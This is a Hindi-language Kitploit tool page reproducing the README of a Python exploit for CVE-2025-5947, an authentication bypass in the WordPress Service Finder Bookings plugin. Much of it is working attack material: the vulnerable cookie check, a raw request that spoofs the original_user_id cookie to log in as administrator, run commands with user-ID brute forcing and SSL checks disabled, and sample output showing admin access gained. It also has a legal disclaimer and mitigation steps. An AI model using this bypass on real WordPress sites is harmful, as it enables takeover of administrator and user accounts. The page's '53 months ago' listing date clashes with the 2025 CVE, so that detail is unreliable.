Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 शोषण | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2025-5947
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 शोषण

रिपॉजिटरी देखें
53 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

WordPress Service Finder Bookings ≤ 6.0 प्लगइन में प्रमाणीकरण बायपास दोष के लिए एक्सप्लॉइट टूल

📋 सामग्री

  • दोष के बारे में
  • तकनीकी विवरण
  • स्थापना
  • उपयोग
  • उदाहरण
  • परिणाम
  • सुरक्षा
  • स्रोत

🔴 दोष के बारे में

CVE-2025-5947

Service Finder Bookings WordPress प्लगइन के संस्करण 6.0 और उससे पहले के संस्करणों में एक गंभीर प्रमाणीकरण बायपास दोष पाया गया है।

🎯 प्रभाव

बिना प्रमाणीकरण वाले हमलावर:

  • ✅ किसी भी उपयोगकर्ता के रूप में लॉगिन कर सकते हैं
  • ✅ व्यवस्थापक खातों तक पहुँच प्राप्त कर सकते हैं
  • ✅ पूर्ण सिस्टम नियंत्रण प्राप्त कर सकते हैं
  • ✅ डेटा लीक कर सकते हैं
  • ✅ दुर्भावनापूर्ण कोड अपलोड कर सकते हैं

🔍 तकनीकी विवरण

दोष का कारण

service_finder_switch_back() फ़ंक्शन में अपर्याप्त कुकी सत्यापन है:

root@kitploit:~
// असुरक्षित कोड
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // कोई सत्यापन नहीं!
}

हमला वेक्टर

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

हमले की विशेषताएँ:

  • 🌐 दूरस्थ पहुँच (AV:N)
  • 🔓 कोई प्रमाणीकरण नहीं (PR:N)
  • 👤 कोई उपयोगकर्ता इंटरेक्शन नहीं (UI:N)
  • 📊 पूर्ण प्रभाव (C:H, I:H, A:H)

📦 स्थापना

आवश्यकताएँ

  • Python 3.6+
  • requests लाइब्रेरी

चरण 1: रिपॉजिटरी को क्लोन करें

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

चरण 2: निर्भरताएँ स्थापित करें

root@kitploit:~
pip install -r requirements.txt

चरण 3: चलाएँ

root@kitploit:~
python exploit.py -u http://target.com

🚀 उपयोग

मूल कमांड

root@kitploit:~
# सहायता दिखाएँ
python exploit.py -h

# व्यवस्थापक (ID=1) के रूप में लॉगिन करने का प्रयास करें
python exploit.py -u http://target.com

# विशिष्ट उपयोगकर्ता ID के साथ
python exploit.py -u http://target.com -i 5

# ब्रूट फ़ोर्स (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL सत्यापन के बिना
python exploit.py -u http://target.com --no-ssl-verify

# कस्टम टाइमआउट के साथ
python exploit.py -u http://target.com -t 30

पैरामीटर

💡 उदाहरण

उदाहरण 1: सरल एक्सप्लॉइट

root@kitploit:~
python exploit.py -u http://wordpress.local

आउटपुट:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings प्लगइन मिला

🔍 उपयोगकर्ता ID 1 के साथ लॉगिन प्रयास किया जा रहा है...
📊 HTTP Status: 302
📋 प्रतिक्रिया हेडर:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ सफल! व्यवस्थापक के रूप में लॉगिन किया गया!
📍 रीडायरेक्ट: http://wordpress.local/wp-admin/

उदाहरण 2: ब्रूट फ़ोर्स

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

आउटपुट:

root@kitploit:~
🔄 ब्रूट फ़ोर्स शुरू (20 उपयोगकर्ता)...
✅ उपयोगकर्ता ID 1: सफल
❌ उपयोगकर्ता ID 2: असफल
✅ उपयोगकर्ता ID 3: सफल
...
✅ सफल उपयोगकर्ता: [1, 3, 5]

उदाहरण 3: HTTPS के साथ SSL सत्यापन के बिना

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 परिणाम

सफल एक्सप्लॉइट में निम्नलिखित संकेतक शामिल हैं:

✅ HTTP 301 या 302 प्रतिक्रिया कोड
✅ Location हेडर में /wp-admin/ का होना
✅ Set-Cookie हेडर में wordpress_logged_in_ का होना

🛡️ सुरक्षा

⚠️ कानूनी चेतावनी

यह उपकरण केवल:

  • ✅ अधिकृत सुरक्षा परीक्षणों के लिए
  • ✅ आपके अपने सिस्टम पर
  • ✅ लिखित अनुमति के साथ

उपयोग किया जाना चाहिए। लेखक जिम्मेदार नहीं है।

🔐 सुरक्षा के तरीके

  1. तत्काल अपडेट

    root@kitploit:~
    # WordPress व्यवस्थापक पैनल से अपडेट करें
    # या WP-CLI के साथ
    wp plugin update sf-booking
    
  2. प्लगइन को निष्क्रिय करें

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. प्लगइन हटाएँ

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. वेब एप्लिकेशन फ़ायरवॉल (WAF)

    root@kitploit:~
    Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. सुरक्षा जाँच

    • व्यवस्थापक खातों की जाँच करें
    • एक्सेस लॉग की समीक्षा करें
    • अनधिकृत लॉगिन की जाँच करें

📚 स्रोत

  • Patchstack डेटाबेस
  • GitHub Advisory
  • NVD विवरण
  • मूल एक्सप्लॉइट
  • CVSS कैलकुलेटर

🤝 योगदान देना

त्रुटियों की रिपोर्ट करने या सुधार सुझाने के लिए:

  1. Fork करें
  2. Feature branch बनाएँ (git checkout -b feature/improvement)
  3. Commit करें (git commit -am 'Add improvement')
  4. Push करें (git push origin feature/improvement)
  5. Pull Request खोलें

📄 लाइसेंस

MIT License - विवरण के लिए LICENSE फ़ाइल देखें

👤 लेखक

सुरक्षा शोधकर्ता

  • GitHub: @yourusername

🙏 धन्यवाद

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ यदि उपयोगी लगे, तो स्टार दें!

🔝 शीर्ष पर वापस जाएँ

टूल डाउनलोड करें
विशेषतामान
CVE IDCVE-2025-5947
प्लगइनService Finder Bookings (sf-booking)
प्रभावित संस्करण≤ 6.0
गंभीरता🔴 गंभीर
CVSS स्कोर9.8
CWECWE-639 (प्राधिकरण बायपास)
EPSS स्कोर0.617 (98.357 प्रतिशतक)
प्रकाशन तिथि2025
पैरामीटरसंक्षिप्त नामविवरणडिफ़ॉल्ट
--url-uलक्ष्य URL (अनिवार्य)-
--user-id-iउपयोगकर्ता ID1
--brute-force-bब्रूट फ़ोर्स रेंज (1-10)-
--no-ssl-verify-SSL सत्यापन अक्षम करेंFalse
--timeout-tअनुरोध टाइमआउट (सेकंड)10